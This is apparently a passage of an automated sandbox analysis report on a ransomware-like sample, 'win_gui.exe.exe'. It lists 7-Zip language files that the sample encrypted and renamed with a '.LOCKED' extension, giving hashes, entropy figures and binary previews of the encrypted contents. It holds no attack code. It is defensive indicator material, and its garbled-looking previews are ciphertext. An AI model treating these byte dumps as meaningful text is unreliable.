                                SSDEEP:96:hTA9E78/QUzjyFTsDlgRajYfBfQXqF8AudWhDACOuHZi5RvUqf8Zb8ZiFAS60EyP:o6gGZ+qRajW4a5yWhDACerpf818k+zoP
                                MD5:DF5927319A8610B58FC401B83813B5C3
                                SHA1:3E2CB09DF3591EE58A736492286B582EEA935BC8
                                SHA-256:0AA9B9C12A7083A1E1B4CFC9F22D98F913AC47A0AEF50EA0F2B3CF93488E06BC
                                SHA-512:6FA25679250C9A2B32478E6F4C81DE41127906C29462AB431766EB43E427A949529D3B1C37166C34F0408D3A5A0851D5E36F23E716CCF9D849CF8AB3EF20244E
                                Malicious:false
                                Preview:Bd..y......NS...>.........WTW+y.<..b...y..q.Z...U...............h....D..>'..............@...'+.rsy.!0T.*.R...K]?^.9.N....[).(..>....3..5Z6;..S.Z...+.yF.6..._...J...........y.B..6.......j..y.^...t...........Y..H*.1(Q)....,..Y..$i.~....!)......pL..:.."5.+.p...A....|...[.....nk.no..?.=<`..Bx..?..N...K'F...|M.=&../...q.....lt..j..W..dP.........+,...{..B..*......Pp.._u.V......+.J.G..&3..8[...@\...M..u..C...n...I.{......,|m.{8$.5......v.m...F.C...pm.g......;.t....../....a.b.K.I..D8o....;.fb.....l<..3i..4..M..L....GK.I...6...?.F.~|*....'.:. .-N4..1.C.Z-/..b=.0..j..q..O.L.Po..%Q_..P..vv.....A...x..4a..6..n...D..GB_`=.x.wu.@C&...D.f..?b..kt]tmnP...K._.q+..\......4.i.1...C.y..NM.. ..>.....S.Z_X.J..`[....o.......lH....o.V....Z...W# ..6....m..W..;+in.gpp=...& [$A...Z...5V.5..e..7,7....@..r.!_..g..e....J.%h.bI :!*../A...E..iD....E........./...X\.d._.krM.X..*.........*B..|&......y|...Q..,...6.0.P....fu....Tw.p..TH.4.......~.f..T......6.c.....5...+.w0W.;56

                                C:\Program Files\7-Zip\Lang\eo.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5860
                                Entropy (8bit):7.967398328435115
                                Encrypted:false
                                SSDEEP:96:hTA9E78/QUzjyFTsDlgRajYfBfQXqF8AudWhDACOuHZi5RvUqf8Zb8ZiFAS60EyP:o6gGZ+qRajW4a5yWhDACerpf818k+zoP
                                MD5:DF5927319A8610B58FC401B83813B5C3
                                SHA1:3E2CB09DF3591EE58A736492286B582EEA935BC8
                                SHA-256:0AA9B9C12A7083A1E1B4CFC9F22D98F913AC47A0AEF50EA0F2B3CF93488E06BC
                                SHA-512:6FA25679250C9A2B32478E6F4C81DE41127906C29462AB431766EB43E427A949529D3B1C37166C34F0408D3A5A0851D5E36F23E716CCF9D849CF8AB3EF20244E
                                Malicious:false
                                Preview:Bd..y......NS...>.........WTW+y.<..b...y..q.Z...U...............h....D..>'..............@...'+.rsy.!0T.*.R...K]?^.9.N....[).(..>....3..5Z6;..S.Z...+.yF.6..._...J...........y.B..6.......j..y.^...t...........Y..H*.1(Q)....,..Y..$i.~....!)......pL..:.."5.+.p...A....|...[.....nk.no..?.=<`..Bx..?..N...K'F...|M.=&../...q.....lt..j..W..dP.........+,...{..B..*......Pp.._u.V......+.J.G..&3..8[...@\...M..u..C...n...I.{......,|m.{8$.5......v.m...F.C...pm.g......;.t....../....a.b.K.I..D8o....;.fb.....l<..3i..4..M..L....GK.I...6...?.F.~|*....'.:. .-N4..1.C.Z-/..b=.0..j..q..O.L.Po..%Q_..P..vv.....A...x..4a..6..n...D..GB_`=.x.wu.@C&...D.f..?b..kt]tmnP...K._.q+..\......4.i.1...C.y..NM.. ..>.....S.Z_X.J..`[....o.......lH....o.V....Z...W# ..6....m..W..;+in.gpp=...& [$A...Z...5V.5..e..7,7....@..r.!_..g..e....J.%h.bI :!*../A...E..iD....E........./...X\.d._.krM.X..*.........*B..|&......y|...Q..,...6.0.P....fu....Tw.p..TH.4.......~.f..T......6.c.....5...+.w0W.;56

                                C:\Program Files\7-Zip\Lang\es.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:COM executable for DOS
                                Category:dropped
                                Size (bytes):10647
                                Entropy (8bit):7.9808678299897595
                                Encrypted:false
                                SSDEEP:192:nxClIjRwcMf2bbawY5kmo7we0EC1HROB4fGs5nFpWAVirgYW+9Azn+1qhImq+VOx:slI1wZY5Y5kmo7sEC5cUGQqjWu8n7hI9
                                MD5:A8BF028267A207CA63204C496B3AFF8C
                                SHA1:B8F64C09A0211E8047E6C3A6BB52D5A7B01AAF30
                                SHA-256:752B412A67DF90FCBE57BD731BE5AA194F6A8B3CA975241D83A378D1044B053C
                                SHA-512:51C11F3E81DFBD858BA315247E169B788F99D69F46ED5232655CF3502D07555D035E7209F879D8C08B6CDECAF75061464FD83C1114197557FBB9A6AFA2308DF2
                                Malicious:false
                                Preview:...S...dw..U.A..)Ga+.HL....0....:..t].p.u..^.....gg..[.qy.p.....SHX.#..^l$...8."..ck.G|....:...r;.q]..;d........J..v.'..g.Io_:...b....0.H/3............^....p.....ph5....5t.N&.+...Q_.&.(..../..E.7.^.'4.:B.1....G)....|J.:.W.."Q....8v..........@...+...r......{5x.......&V(%...~V}...@}....@....FS14O..#~z..6.>..o..|....L.........z....9,.B..vj.?<...6.N,... ......e..j..3Dh.:%...a..#...U.E..._.O..!J....P.$.X2........8Ex..Z&.%.(.#..tL.Y..'i...v2Z.h.)!x...x...g\....pH..o.I..e.$...Gt..5.R.d...t.;.W.....w..q.j..U.gi......y...8....OO>..TK....d.....!.k...0C..4...'|.U}.f....L........N... -..r..t....GyX2P.Ij.9..........2.k.....W..q...Kf..A.5}..6.-...61....XMT....:K...I....Y...@.R..n.x...W..X.Y....V.s.....>.0 ......i.JD.D...b0L...?...l1U..4...4..*D..ldzY..B.I.....Z-./.Ma.x.e..._.qgQ.<gm~...Y.p..)..&Wc...z.=Ax..B..bG.................x......2.. /.....>*EuP^t6sRd..F.....`...B....VNp...-.0...L.9..1Z.i.n..X_...P.....|..ni..Q....k....h.2.|(.........K.h..i.l.d

                                C:\Program Files\7-Zip\Lang\es.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:COM executable for DOS
                                Category:dropped
                                Size (bytes):10647
                                Entropy (8bit):7.9808678299897595
                                Encrypted:false
                                SSDEEP:192:nxClIjRwcMf2bbawY5kmo7we0EC1HROB4fGs5nFpWAVirgYW+9Azn+1qhImq+VOx:slI1wZY5Y5kmo7sEC5cUGQqjWu8n7hI9
                                MD5:A8BF028267A207CA63204C496B3AFF8C
                                SHA1:B8F64C09A0211E8047E6C3A6BB52D5A7B01AAF30
                                SHA-256:752B412A67DF90FCBE57BD731BE5AA194F6A8B3CA975241D83A378D1044B053C
                                SHA-512:51C11F3E81DFBD858BA315247E169B788F99D69F46ED5232655CF3502D07555D035E7209F879D8C08B6CDECAF75061464FD83C1114197557FBB9A6AFA2308DF2
                                Malicious:false
                                Preview:...S...dw..U.A..)Ga+.HL....0....:..t].p.u..^.....gg..[.qy.p.....SHX.#..^l$...8."..ck.G|....:...r;.q]..;d........J..v.'..g.Io_:...b....0.H/3............^....p.....ph5....5t.N&.+...Q_.&.(..../..E.7.^.'4.:B.1....G)....|J.:.W.."Q....8v..........@...+...r......{5x.......&V(%...~V}...@}....@....FS14O..#~z..6.>..o..|....L.........z....9,.B..vj.?<...6.N,... ......e..j..3Dh.:%...a..#...U.E..._.O..!J....P.$.X2........8Ex..Z&.%.(.#..tL.Y..'i...v2Z.h.)!x...x...g\....pH..o.I..e.$...Gt..5.R.d...t.;.W.....w..q.j..U.gi......y...8....OO>..TK....d.....!.k...0C..4...'|.U}.f....L........N... -..r..t....GyX2P.Ij.9..........2.k.....W..q...Kf..A.5}..6.-...61....XMT....:K...I....Y...@.R..n.x...W..X.Y....V.s.....>.0 ......i.JD.D...b0L...?...l1U..4...4..*D..ldzY..B.I.....Z-./.Ma.x.e..._.qgQ.<gm~...Y.p..)..&Wc...z.=Ax..B..bG.................x......2.. /.....>*EuP^t6sRd..F.....`...B....VNp...-.0...L.9..1Z.i.n..X_...P.....|..ni..Q....k....h.2.|(.........K.h..i.l.d

                                C:\Program Files\7-Zip\Lang\et.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7679
                                Entropy (8bit):7.974972707129825
                                Encrypted:false
                                SSDEEP:192:ByKxdPQ4sPsrbh74f1JsQawIXcrcqfaCjKqG++VOb:EKxdPQ4DXh0cQaO7Tj5+VOb
                                MD5:0056E752BD77488889E1FBCF0D9CB371
                                SHA1:B2035C6D71137DD49D2BFC3BDD9B48DBDC62FACD
                                SHA-256:D310A211FE0177127D98BCFA8B593A16A70D203C961CF512FE1171525E3703AB
                                SHA-512:951D65C5E9A59E2E1FA4CD9288273A3D12E928C3FECB040B3FC5CB60D05EC26F0B3CABCFD0A9D9C39533DFC75615428847288BD445C8FB9A237A3F1205C6B3B0
                                Malicious:false
                                Preview:2l..MT3....k.%.-...V....{y ...}......9..6..H.JX.......1..._..q....8=....>8_..Q.>-0..~..T.i}.o.9......k.1.1V/........5....p`...{|.:......]..o.".p..B9.UM/.oE.G.b. .:.'...k[...S8....y.h..l..w.'L................G.-.t..:.9..7L..J.\.......U.......c....L-)T...BF....d.....H*....t.Vl.j..S...O.Hu.d...I.m.Pz..k..U....._a].&..q..4.+.o...Z1...H..$i.d....u...}....(n..'N..H..H........W\l...D8.....E|..T...V/..[?......g..~1H..p~....;t..oO....o...`..W[..%...G...:...~v.#.".F&=./gd.A`;..0......=..:...w/..K.W:......*..{v.......%$...|..2l|...g.lSZ.\.....Iz-.tx..S.E!.!.....e3.w:...f..Bw&.p.L.5...Y..^.3 .....\n.6..ik......Q....M.z..E.{.d..9EE.q;.).tn..>..3.|..t.iY...%.....~.H.m....5...!.V.V.+.#.35\s...FZ~.....ZS.(d..(w$YW..&-..U.aK.....hmb.`..{.@'......eC.J]q...WC........|=...j.z..z.7x.2._.,.#..a;.]...c_.D..P.h`.qf9...`..6l...U[..."_...X.....RL+D.H7...A.....`E....=o./s\.r@"&.\O[.Z9.w.D...b...h...B.t..Yr.,.x.O.>5..Tb6I/>.UeT(.!.1..+B.W.N.&...#...z.....c

                                C:\Program Files\7-Zip\Lang\et.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7679
                                Entropy (8bit):7.974972707129825
                                Encrypted:false
                                SSDEEP:192:ByKxdPQ4sPsrbh74f1JsQawIXcrcqfaCjKqG++VOb:EKxdPQ4DXh0cQaO7Tj5+VOb
                                MD5:0056E752BD77488889E1FBCF0D9CB371
                                SHA1:B2035C6D71137DD49D2BFC3BDD9B48DBDC62FACD
                                SHA-256:D310A211FE0177127D98BCFA8B593A16A70D203C961CF512FE1171525E3703AB
                                SHA-512:951D65C5E9A59E2E1FA4CD9288273A3D12E928C3FECB040B3FC5CB60D05EC26F0B3CABCFD0A9D9C39533DFC75615428847288BD445C8FB9A237A3F1205C6B3B0
                                Malicious:false
                                Preview:2l..MT3....k.%.-...V....{y ...}......9..6..H.JX.......1..._..q....8=....>8_..Q.>-0..~..T.i}.o.9......k.1.1V/........5....p`...{|.:......]..o.".p..B9.UM/.oE.G.b. .:.'...k[...S8....y.h..l..w.'L................G.-.t..:.9..7L..J.\.......U.......c....L-)T...BF....d.....H*....t.Vl.j..S...O.Hu.d...I.m.Pz..k..U....._a].&..q..4.+.o...Z1...H..$i.d....u...}....(n..'N..H..H........W\l...D8.....E|..T...V/..[?......g..~1H..p~....;t..oO....o...`..W[..%...G...:...~v.#.".F&=./gd.A`;..0......=..:...w/..K.W:......*..{v.......%$...|..2l|...g.lSZ.\.....Iz-.tx..S.E!.!.....e3.w:...f..Bw&.p.L.5...Y..^.3 .....\n.6..ik......Q....M.z..E.{.d..9EE.q;.).tn..>..3.|..t.iY...%.....~.H.m....5...!.V.V.+.#.35\s...FZ~.....ZS.(d..(w$YW..&-..U.aK.....hmb.`..{.@'......eC.J]q...WC........|=...j.z..z.7x.2._.,.#..a;.]...c_.D..P.h`.qf9...`..6l...U[..."_...X.....RL+D.H7...A.....`E....=o./s\.r@"&.\O[.Z9.w.D...b...h...B.t..Yr.,.x.O.>5..Tb6I/>.UeT(.!.1..+B.W.N.&...#...z.....c

                                C:\Program Files\7-Zip\Lang\eu.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9502
                                Entropy (8bit):7.975958883392602
                                Encrypted:false
                                SSDEEP:192:SB0lCqVhe7LQcdLhmKPEYDE8FCAqVkIEJKfGH+u6yWFEsT3BDmygr+VO28Y:+TqVY7LQcdL7EYHC7pLfGDnsz2r+VO2p
                                MD5:8D7F8C4326E490330715E2316E06A9BB
                                SHA1:3BB3C27AC20026C7E4FF803C3E2051C946A5414C
                                SHA-256:96CBCD71014C29748A0FC016A73AF75528BAF332A7C1A48356F50304B2013AF6
                                SHA-512:D551B60A5F7EF9BA7302E505E782F2E7414D9AD9BD9EF444AFC635066165CB3CF41C80684F5CDC100A0F3605602AEBC7B619BEC270BD1281F6B9DD2CBB28767F
                                Malicious:false
                                Preview::.t48...-.j..]...d.M....T.yV..Q.`8*.W27I...>.G...<m..Kv...`N;P....\r..um. ......W..5U{.e...K}9.......H.Nm....^`.J..k....uO.Vz.J.U.".[.......e.L'.....|...(n.t.^(.\&.1#......ik;.,h-...wJ.$.....c.....gi..}.47R..S.w......wM......t....Z...$.N.j.......u.1_........./..g/..XJzU....N4...][..9/M.Jxp..W....V..x......\DB..Cb.Y......./..S......k.J....@GM. ..s.T.;...|.z.xL.@..5..l-...?.5.h+f.c_&)../....UN.........,e...rz..b.;....j....a@..X...}..........k8.UN"n6..".*.^..qo/axG. .:at..M...&/..r..7"'...L{.....%.PF.z.k.\....1.|..z(.9.4@Y.C\.I....<..x....f......f%.u8.\.?...LwD&....KK.+.w..a.|.....*...{._...IM.xFe...G..S.....i....y..e.V.. .....L.d. qfW.......V......4...h3$j.......... ..yG..M>...KK\o.YpAs/cK...l...E............6N[h....6..':...i..O....s.l.O'..b..WOR...I.s..HT..}.]....`..9...U...$0.K....3...$.../....iD....L~ .X7..M.1.G... m5...y..Z.v.E.6J.M.!n.LN....../J...M..C...p!..t......y.J...Ss.>.......^l:L.........N..@..:...++V............

                                C:\Program Files\7-Zip\Lang\eu.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9502
                                Entropy (8bit):7.975958883392602
                                Encrypted:false
                                SSDEEP:192:SB0lCqVhe7LQcdLhmKPEYDE8FCAqVkIEJKfGH+u6yWFEsT3BDmygr+VO28Y:+TqVY7LQcdL7EYHC7pLfGDnsz2r+VO2p
                                MD5:8D7F8C4326E490330715E2316E06A9BB
                                SHA1:3BB3C27AC20026C7E4FF803C3E2051C946A5414C
                                SHA-256:96CBCD71014C29748A0FC016A73AF75528BAF332A7C1A48356F50304B2013AF6
                                SHA-512:D551B60A5F7EF9BA7302E505E782F2E7414D9AD9BD9EF444AFC635066165CB3CF41C80684F5CDC100A0F3605602AEBC7B619BEC270BD1281F6B9DD2CBB28767F
                                Malicious:false
                                Preview::.t48...-.j..]...d.M....T.yV..Q.`8*.W27I...>.G...<m..Kv...`N;P....\r..um. ......W..5U{.e...K}9.......H.Nm....^`.J..k....uO.Vz.J.U.".[.......e.L'.....|...(n.t.^(.\&.1#......ik;.,h-...wJ.$.....c.....gi..}.47R..S.w......wM......t....Z...$.N.j.......u.1_........./..g/..XJzU....N4...][..9/M.Jxp..W....V..x......\DB..Cb.Y......./..S......k.J....@GM. ..s.T.;...|.z.xL.@..5..l-...?.5.h+f.c_&)../....UN.........,e...rz..b.;....j....a@..X...}..........k8.UN"n6..".*.^..qo/axG. .:at..M...&/..r..7"'...L{.....%.PF.z.k.\....1.|..z(.9.4@Y.C\.I....<..x....f......f%.u8.\.?...LwD&....KK.+.w..a.|.....*...{._...IM.xFe...G..S.....i....y..e.V.. .....L.d. qfW.......V......4...h3$j.......... ..yG..M>...KK\o.YpAs/cK...l...E............6N[h....6..':...i..O....s.l.O'..b..WOR...I.s..HT..}.]....`..9...U...$0.K....3...$.../....iD....L~ .X7..M.1.G... m5...y..Z.v.E.6J.M.!n.LN....../J...M..C...p!..t......y.J...Ss.>.......^l:L.........N..@..:...++V............

                                C:\Program Files\7-Zip\Lang\ext.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8329
                                Entropy (8bit):7.978525790272492
                                Encrypted:false
                                SSDEEP:192:FJ2tbPU/kQOciOH9Z8+BRN8cJwKEB2RbenSefvQ+MFCr+4+VOkg:FJcbPQkQ9H9O+/BwBB2RzefvQlk+4+Vu
                                MD5:7DEBF0EDBA04E020DBFFFF1EACCEDDE0
                                SHA1:852DEACF54616ACF190771A9CF39F829BA39D204
                                SHA-256:163F9E5ECE752699B75B4CA8FA0D1420D1CFA92D684A8BA24CCCBB628CB01FF5
                                SHA-512:9003F770427FD0E47A23B20920FADCC7DFBD8275C225384C4A4337499D22CB84A62CA3A76852E14461FEEBF8895E71211A0181AF4AB6A8AD6DC2C2047D33F267
                                Malicious:false
                                Preview:@1...t..r..4m.k.K..?...(7]..5x....X..9.X4.>f...F2........|U...;Q]B..Cp.i.;7...Xd......Ci.x.6H....U.:.B.-...^Sw..X_....}..o.....D... ....cj...?...b.|..Yn^u.4.;....JA..%.(.X%.<t..pd..,.......[{.zy.3...~?.....t7...d..kYC..>d...d.....#..i..2l....5.=.HO.@.0f..KB.G..Y..j.-/P...}:.k.(r..<pl..i`.Q.v...T..(@A....jEN/.I/G..oy.....rl...t..x.....:F.......=.....&..jS`.L]....j........._..a..w|.k.{}....u^.K....<..O.].[0*..t..]w..0.<.+...;-...a.\...[..wz8R.6..............a..m;....c......Xx..NY<t..}.s.o\.F]...wV<.n....<...vo..8.6.m^~.............iM^U.R.d).K.G.Z..o.7\`.....(,n].b...8........SZ{..F>..d.Q'tx...<.^I62,.).z......../..iS.Z...Q........9..J.,...f.`.Zk.r.7b.O...p#..@..M.....'.b.;MU&..F....|.IBP..0.L...~...:..mA...N.T..g..;..W:>.yM.l.V.....U.1..v.Ps.(u.c.....)l.m.c\s....b.....M..`@.%.(.L.i.Rr..1\..f...Yh..JI...U.....O....b..7%..}D7..a...,.......Su.i.{dM.b_hA...9c.S;....6...s.;3.............. ...J.O.S.6[)..p`.w.......dG.QU.....#..r.GWLK..yl.b.....4U

                                C:\Program Files\7-Zip\Lang\ext.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8329
                                Entropy (8bit):7.978525790272492
                                Encrypted:false
                                SSDEEP:192:FJ2tbPU/kQOciOH9Z8+BRN8cJwKEB2RbenSefvQ+MFCr+4+VOkg:FJcbPQkQ9H9O+/BwBB2RzefvQlk+4+Vu
                                MD5:7DEBF0EDBA04E020DBFFFF1EACCEDDE0
                                SHA1:852DEACF54616ACF190771A9CF39F829BA39D204
                                SHA-256:163F9E5ECE752699B75B4CA8FA0D1420D1CFA92D684A8BA24CCCBB628CB01FF5
                                SHA-512:9003F770427FD0E47A23B20920FADCC7DFBD8275C225384C4A4337499D22CB84A62CA3A76852E14461FEEBF8895E71211A0181AF4AB6A8AD6DC2C2047D33F267
                                Malicious:false
                                Preview:@1...t..r..4m.k.K..?...(7]..5x....X..9.X4.>f...F2........|U...;Q]B..Cp.i.;7...Xd......Ci.x.6H....U.:.B.-...^Sw..X_....}..o.....D... ....cj...?...b.|..Yn^u.4.;....JA..%.(.X%.<t..pd..,.......[{.zy.3...~?.....t7...d..kYC..>d...d.....#..i..2l....5.=.HO.@.0f..KB.G..Y..j.-/P...}:.k.(r..<pl..i`.Q.v...T..(@A....jEN/.I/G..oy.....rl...t..x.....:F.......=.....&..jS`.L]....j........._..a..w|.k.{}....u^.K....<..O.].[0*..t..]w..0.<.+...;-...a.\...[..wz8R.6..............a..m;....c......Xx..NY<t..}.s.o\.F]...wV<.n....<...vo..8.6.m^~.............iM^U.R.d).K.G.Z..o.7\`.....(,n].b...8........SZ{..F>..d.Q'tx...<.^I62,.).z......../..iS.Z...Q........9..J.,...f.`.Zk.r.7b.O...p#..@..M.....'.b.;MU&..F....|.IBP..0.L...~...:..mA...N.T..g..;..W:>.yM.l.V.....U.1..v.Ps.(u.c.....)l.m.c\s....b.....M..`@.%.(.L.i.Rr..1\..f...Yh..JI...U.....O....b..7%..}D7..a...,.......Su.i.{dM.b_hA...9c.S;....6...s.;3.............. ...J.O.S.6[)..p`.w.......dG.QU.....#..r.GWLK..yl.b.....4U

                                C:\Program Files\7-Zip\Lang\fa.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14404
                                Entropy (8bit):7.987697832725955
                                Encrypted:false
                                SSDEEP:384:E+lGVyh8wxaPVQMG0ZaM/Br39ER5P94fBM3Igva9c2W+VOe:E+Uyh/xAQMGQaMZ+R9IBpoa9c2Wy
                                MD5:18E60EA09B615A27EDE66AD154BC1D39
                                SHA1:5365AB36CCD48BBCDDAD713A9FB6187EA0471B77
                                SHA-256:E954ACA33CAA2065B65E859C366E922ACE4765FB6FA9E176F2B9E47818805703
                                SHA-512:050D42C017A9346CD1ED4A1031DC47CAADABC3C4EBF0EE6347323DD83D92BFB64B5E11B9A67176C6A2CFB04CA02E21ACC6E79A9B573839ADF64E1EADDFBE6C4D
                                Malicious:false
                                Preview:'.......!kS....Mv.....#....7_.sk_x. .).K.U.uG....8x}.-.C.^....%)......D..s....N6y..kn....-..d...i...%L.7...iYb&Y].C..]...q..].Ou.\.g....f..r.D..........M.[:..6......-...fP....O.).j..g.T..I.U..kDa7.z/?..:p.bD~.T4......B.v..JZ.C.NI...}P..0.....V+.c5.j.....v.:.S....r..D.....^B..L..)..).7..$UY.F..3.U..C......)....c....u..b.....?q3.....j.....K-?h...`........pd..Mc..X...y......JI..6.......{.e..."w..9q.....<.d>.....Sr..z.v.\..W.....`[.7..6Yj.e.:....D...^9.*..y.b.X..s3I....&..z.w...&.G...D..u.../.@.....L....>,.r"...W..d.O.go9....A.+...$..../.@...J.Gl;.b~....l...t&C*I....]:..]=....7.\.).a.8..'.wY.F.'.e.?.9..9.p..9B(.z#.........V.....-....MC.:RW&{.~..Cz|..,.gp.....8]....:....+..t..4..dJ....Gu,......X.S..;&.W......?....Y...p.v`J8.C.............~.2:.L..U.5..I@R....-^...3...7...<...v...*.....[2..._B./.YP|.U..n...P,........>yO.v.cN.I/.....4d...}s..v...K.j...&12.*.....1'....0?.6t.._.fs..Ai...%. ....b..n"9..4}..x....L..H.z..,(....6D.d.\c.M.{ ..x

                                C:\Program Files\7-Zip\Lang\fa.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14404
                                Entropy (8bit):7.987697832725955
                                Encrypted:false
                                SSDEEP:384:E+lGVyh8wxaPVQMG0ZaM/Br39ER5P94fBM3Igva9c2W+VOe:E+Uyh/xAQMGQaMZ+R9IBpoa9c2Wy
                                MD5:18E60EA09B615A27EDE66AD154BC1D39
                                SHA1:5365AB36CCD48BBCDDAD713A9FB6187EA0471B77
                                SHA-256:E954ACA33CAA2065B65E859C366E922ACE4765FB6FA9E176F2B9E47818805703
                                SHA-512:050D42C017A9346CD1ED4A1031DC47CAADABC3C4EBF0EE6347323DD83D92BFB64B5E11B9A67176C6A2CFB04CA02E21ACC6E79A9B573839ADF64E1EADDFBE6C4D
                                Malicious:false
                                Preview:'.......!kS....Mv.....#....7_.sk_x. .).K.U.uG....8x}.-.C.^....%)......D..s....N6y..kn....-..d...i...%L.7...iYb&Y].C..]...q..].Ou.\.g....f..r.D..........M.[:..6......-...fP....O.).j..g.T..I.U..kDa7.z/?..:p.bD~.T4......B.v..JZ.C.NI...}P..0.....V+.c5.j.....v.:.S....r..D.....^B..L..)..).7..$UY.F..3.U..C......)....c....u..b.....?q3.....j.....K-?h...`........pd..Mc..X...y......JI..6.......{.e..."w..9q.....<.d>.....Sr..z.v.\..W.....`[.7..6Yj.e.:....D...^9.*..y.b.X..s3I....&..z.w...&.G...D..u.../.@.....L....>,.r"...W..d.O.go9....A.+...$..../.@...J.Gl;.b~....l...t&C*I....]:..]=....7.\.).a.8..'.wY.F.'.e.?.9..9.p..9B(.z#.........V.....-....MC.:RW&{.~..Cz|..,.gp.....8]....:....+..t..4..dJ....Gu,......X.S..;&.W......?....Y...p.v`J8.C.............~.2:.L..U.5..I@R....-^...3...7...<...v...*.....[2..._B./.YP|.U..n...P,........>yO.v.cN.I/.....4d...}s..v...K.j...&12.*.....1'....0?.6t.._.fs..Ai...%. ....b..n"9..4}..x....L..H.z..,(....6D.d.\c.M.{ ..x

                                C:\Program Files\7-Zip\Lang\fi.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9639
                                Entropy (8bit):7.978504735634505
                                Encrypted:false
                                SSDEEP:192:SsQ2WL7DCcFcZycIv0OVWiPLvJ3CDfpKuOvX2AA3L9kWDtm5V+VOw:ETL7DCM8NTiPVSlK0L9kWDtm5V+VOw
                                MD5:66CBDC2FCADE453F68A4F2183EBBDA7E
                                SHA1:CDE14FF011E24892302F3E03AE06E2285EA87DAC
                                SHA-256:79B03424DC06F2124FEE0FBB49A31FABB82F11ED2DD04D7094230DFF554872FC
                                SHA-512:90F90FCA13347B6CFFE35E46B854701F23AD2A3B4D08BDB9C988F979F41DB38D27A90BCC40352EEF929A66D4790960998856D66E30B579F5F51E26C2668D217C
                                Malicious:false
                                Preview:X.J.X..80.....cDm.^.yr.....M..0?.....Y..t...[W#...3..<8.@...%Z.L.Kg..5F....\...!...1..v+...cy..v....v3m.!.T....!.ax....-./..y..|.......N..B.Rc.(..._,.V/.B..T......3..I.r....y.....,..c.b...].P.g...+3....}p.Z...Z.zM..ne./b}Y..j....c..M.p..6..h..e..|....Z.~-j...........~.*.Wp.2.>.._..*eNDr...D......g.&k..8.......`...O.....A."...}y..3....{...d....3.M...[q...p.f.|..|`.>....u.6.Q.C.8.o.^..ZW7...~..<*e...V8WEm.J..6B.?z.Q|?rxD0e..B.@Pr...v..i........Uw.J.$e.-..Q..`.....;4.?0.....~.#.a.|I...Q./7\8x...g ..aK....*q*.N...\5.>.W".;....9.H..i.h.x.y.y...#..'.;e.l)Id7W...y....i.ZMK.r../.#..Q.n.......&.A.c .y[<.#P.?.g\n.;..............6M`.7.......~.Ah....tw.L._..n...3.v.vMY&..v.a...|.Cr. ..D...^F....=...c.9....;...>.>.P,.L..f..a...9,..s;.{Q.$..Y.....M....c..".>.n.....%..+?.*.V..r3^.........T?n.G.Ha&....x.Z.6...P.?*....y..y.=.....-!X...~$....d_.V...0./Y.f.^.lCB\=g........l.|.5.Hh].@. _.z.....Q......-....!.6-7....fC.M.e!5...R..1z....>.Ni..pe........O..H...N...+

                                C:\Program Files\7-Zip\Lang\fi.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9639
                                Entropy (8bit):7.978504735634505
                                Encrypted:false
                                SSDEEP:192:SsQ2WL7DCcFcZycIv0OVWiPLvJ3CDfpKuOvX2AA3L9kWDtm5V+VOw:ETL7DCM8NTiPVSlK0L9kWDtm5V+VOw
                                MD5:66CBDC2FCADE453F68A4F2183EBBDA7E
                                SHA1:CDE14FF011E24892302F3E03AE06E2285EA87DAC
                                SHA-256:79B03424DC06F2124FEE0FBB49A31FABB82F11ED2DD04D7094230DFF554872FC
                                SHA-512:90F90FCA13347B6CFFE35E46B854701F23AD2A3B4D08BDB9C988F979F41DB38D27A90BCC40352EEF929A66D4790960998856D66E30B579F5F51E26C2668D217C
                                Malicious:false
